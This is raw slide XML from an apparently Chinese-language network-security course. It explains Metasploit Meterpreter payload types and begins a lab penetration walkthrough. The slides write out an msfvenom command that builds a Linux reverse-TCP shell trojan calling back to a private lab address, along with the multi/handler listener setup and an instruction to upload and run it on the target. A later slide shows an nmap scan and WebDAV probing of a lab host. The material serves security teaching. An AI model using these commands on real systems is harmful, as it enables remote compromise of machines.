            <a:ext cx="252478"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solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>学期</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307361" y="798175"/>
            <a:ext cx="7460956" cy="750203"/>
            <a:chOff x="180042" y="928625"/>
            <a:chExt cx="7381902" cy="561557"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="180042" y="928625"/>
              <a:ext cx="7381902" cy="515546"/>
              <a:chOff x="2235016" y="7042507"/>
              <a:chExt cx="7381902" cy="515546"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="平行四边形 22"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2259393" y="7042507"/>
                <a:ext cx="400542" cy="19542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平行四边形 24"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2235016" y="7096388"/>
                <a:ext cx="7381902" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="parallelogram">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="69000">
                    <a:srgbClr val="1A5CC0">
                      <a:alpha val="51000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="1A5CC0">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:srgbClr val="1A5C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等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="矩形 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="333829" y="1028517"/>
              <a:ext cx="4152099"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场景驱动、角色支撑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第三级</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873337" y="473979"/>
            <a:ext cx="4557658" cy="759952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>角色定位：网络安全实战者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>场       景：实战环境中发现问题、解决问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="18144">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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:t>中常见的反弹类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608330" y="1490345"/>
            <a:ext cx="11336020" cy="5273675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="60000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t>reverse_tcp：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2700" b="1" dirty="0"/>
              <a:t>基于TCP的反向链接反弹shell, 使用起来很稳定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" b="1" dirty="0"/>
              <a:t>  生成一个Linux下反弹shell木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444  -f elf -o isshell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>         当前目录下生成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>isshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件，增加可执行权限  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>u+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>isshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0"/>
              <a:t>  打开Metasploit，使用模块handler，设置payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>，注意：这里设置的payload要和生成木马所用的payload一样</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>linux/x86/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>设置下地址和端口，我们就开始监听了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x.x.x.x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> xx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       需要将生成的反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上传到目标主机，并且运行该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：基于http方式的反向连接  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(payload:/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于http方式的反向连接  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(payload:/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于TCP的正向连接shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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182"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="91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渗透实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>端口扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -T4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -v 192.168.2.222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446530" y="2425065"/>
            <a:ext cx="6570980" cy="4217670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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渗透实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>找漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指导书列出了很多漏洞，这次我们找一个新的漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上面的扫描结果来看，发现目标主机上有web服务器，服务器为apache 2.2.8+DAV2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3090545" y="2705100"/>
            <a:ext cx="4343400" cy="4152900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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渗透实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:t>找找是否有这个漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4406900" y="25400"/>
            <a:ext cx="6673850" cy="683260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35841" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636270" y="643890"/>
            <a:ext cx="4978400" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" i="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Davtext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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--------kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="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官方介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609725" y="2552700"/>
            <a:ext cx="9144000" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
